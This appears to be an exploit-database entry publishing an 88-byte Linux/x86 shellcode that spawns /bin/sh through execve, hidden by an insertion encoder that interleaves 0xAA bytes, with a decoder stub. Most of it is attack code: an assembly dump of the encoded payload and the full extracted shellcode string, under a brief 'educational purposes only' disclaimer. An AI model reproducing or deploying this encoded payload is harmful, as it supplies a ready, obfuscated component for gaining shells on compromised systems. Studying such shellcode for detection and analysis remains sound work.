Exploits / Vulnerability Discovered : 2019-03-08 |
Type : shellcode |
Platform : linux_x86
This exploit / vulnerability Linux/x86 insertion encoder / decoder execve(/bin/sh) shellcode (88 bytes) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
/*
'''
; Date: 07/03/2019
; Insertion-Encoder.asm
; Author: Daniele Votta
; Description: This program encode shellcode with insertion technique (0xAA).
; Tested on: i686 GNU/Linux
'''
080480a4 <EncodedShellcode>:
80480a4: 31 aa c0 aa 50 aa xor DWORD PTR [edx-0x55af5540],ebp
80480aa: 68 aa 2f aa 2f push 0x2faa2faa
80480af: aa stos BYTE PTR es:[edi],al
80480b0: 73 aa jae 804805c <_start-0x24>
80480b2: 68 aa 68 aa 2f push 0x2faa68aa
80480b7: aa stos BYTE PTR es:[edi],al
80480b8: 62 aa 69 aa 6e aa bound ebp,QWORD PTR [edx-0x55915597]
80480be: 89 aa e3 aa 50 aa mov DWORD PTR [edx-0x55af551d],ebp
80480c4: 89 aa e2 aa 53 aa mov DWORD PTR [edx-0x55ac551e],ebp
80480ca: 89 aa e1 aa b0 aa mov DWORD PTR [edx-0x554f551f],ebp
80480d0: 0b aa cd aa 80 aa or ebp,DWORD PTR [edx-0x557f5533]
80480d6: bb .byte 0xbb
80480d7: bb .byte 0xbb
[+] Extract Shellcode ...
"\xeb\x1d\x5e\x8d\x7e\x01\x31\xc0\xb0\x01\x31\xdb\x8a\x1c\x06\x80\xf3\xaa\x75\x10\x8a\x5c\x06\x01\x88\x1f\x47\x04\x02\xeb\xed\xe8\xde\xff\xff\xff\x31\xaa\xc0\xaa\x50\xaa\x68\xaa\x2f\xaa\x2f\xaa\x73\xaa\x68\xaa\x68\xaa\x2f\xaa\x62\xaa\x69\xaa\x6e\xaa\x89\xaa\xe3\xaa\x50\xaa\x89\xaa\xe2\xaa\x53\xaa\x89\xaa\xe1\xaa\xb0\xaa\x0b\xaa\xcd\xaa\x80\xaa\xbb\xbb"